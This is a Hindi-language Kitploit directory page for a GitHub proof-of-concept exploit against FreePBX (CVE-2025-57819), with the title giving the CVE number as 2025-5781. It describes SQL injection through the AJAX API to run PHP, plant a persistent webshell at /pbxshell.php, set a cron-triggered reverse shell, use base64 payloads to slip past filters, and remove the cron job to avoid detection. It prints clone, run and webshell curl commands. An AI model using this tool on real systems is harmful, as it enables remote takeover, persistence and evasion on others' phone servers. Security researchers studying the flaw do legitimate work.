Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-5781 — FreePBX में CVE-2025-57819 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: AJAX API में SQL इंजेक्शन के माध्यम से मनमाना PHP कोड निष्पादित करना, एक स्थायी वेबशेल बनाना, और रिवर्स शेल ट्रिगर करना। | Kitploit
उपकरण/GitHubGitHub/jasonbernier/cve-2025-5781
स्थायित्व तंत्रशोषणवेब एप्लिकेशन शोषणपोस्ट-शोषणकमांड एंड कंट्रोलपेलोड डेवलपमेंट
GitHubjasonbernier/cve-2025-5781

CVE-2025-5781

FreePBX में CVE-2025-57819 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट: AJAX API में SQL इंजेक्शन के माध्यम से मनमाना PHP कोड निष्पादित करना, एक स्थायी वेबशेल बनाना, और रिवर्स शेल ट्रिगर करना।

रिपॉजिटरी देखें
171 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

FreePBX CVE-2025-57819 एक्सप्लॉइट

विवरण

यह स्क्रिप्ट FreePBX के 16.0.26.0 से पहले के संस्करणों (CVE-2025-57819) में एक कमजोरी का शोषण करती है, जो दूरस्थ हमलावरों को AJAX API एंडपॉइंट में SQL इंजेक्शन दोष के माध्यम से मनमाना PHP कोड निष्पादित करने की अनुमति देती है। यह एक्सप्लॉइट एक वेबशेल और एक स्वतः ट्रिगर होने वाला रिवर्स शेल दोनों बनाता है।

कमजोरी का विवरण

  • CVE: CVE-2025-57819
  • प्रभावित संस्करण: FreePBX < 16.0.26.0
  • प्रभाव: रिमोट कोड निष्पादन (RCE)
  • वेक्टर: AJAX API में SQL इंजेक्शन (/admin/ajax.php)

विशेषताएँ

  • /pbxshell.php पर एक स्थायी वेबशेल बनाता है
  • क्रॉन जॉब के माध्यम से स्वतः ट्रिगर होने वाला रिवर्स शेल सेट करता है
  • फ़िल्टर को बायपास करने के लिए Base64-एन्कोडेड पेलोड का उपयोग करता है
  • निष्पादन के बाद क्रॉन जॉब की स्वचालित सफाई

आवश्यकताएँ

  • Python 3.x
  • requests लाइब्रेरी
  • Netcat (रिवर्स शेल लिसनर के लिए)

स्थापना

git clone https://github.com/jasonbernier/CVE-2025-5781.git
cd CVE-2025-5781
pip install requests

उपयोग

python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT

पैरामीटर:

  • -H HOST: लक्षित FreePBX इंस्टेंस (जैसे, https://freepbx.example.com)
  • -lhost LHOST: रिवर्स शेल कॉलबैक के लिए आपका IP
  • -lport LPORT: रिवर्स शेल कनेक्शन के लिए पोर्ट

उदाहरण:

python3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444

एक्सप्लॉइट प्रवाह

  1. वेबशेल बनाने के लिए SQL इंजेक्शन पेलोड भेजता है
  2. वेबशेल बनने की प्रतीक्षा करता है (~2 मिनट)
  3. क्रॉन जॉब के माध्यम से स्वतः ट्रिगर होने वाला रिवर्स शेल बनाता है
  4. निर्दिष्ट पोर्ट पर netcat लिसनर शुरू करता है

वेबशेल उपयोग

सफल शोषण के बाद, वेबशेल तक इस प्रकार पहुँचें:

curl -X GET "http://TARGET/pbxshell.php?cmd=id"

सफाई

पता लगने से बचने के लिए एक्सप्लॉइट निष्पादन के बाद क्रॉन जॉब को स्वचालित रूप से हटा देता है।

नोट्स

  • स्क्रिप्ट शेष SQL सिंटैक्स को कमेंट करने के लिए -- का उपयोग करती है
  • सभी कमांड रूट विशेषाधिकारों के साथ निष्पादित किए जाते हैं
  • /var/www/html/ निर्देशिका में लिखने की अनुमति की आवश्यकता होती है

संदर्भ

  • CVE-2025-57819
  • FreePBX सुरक्षा सलाह
टूल डाउनलोड करें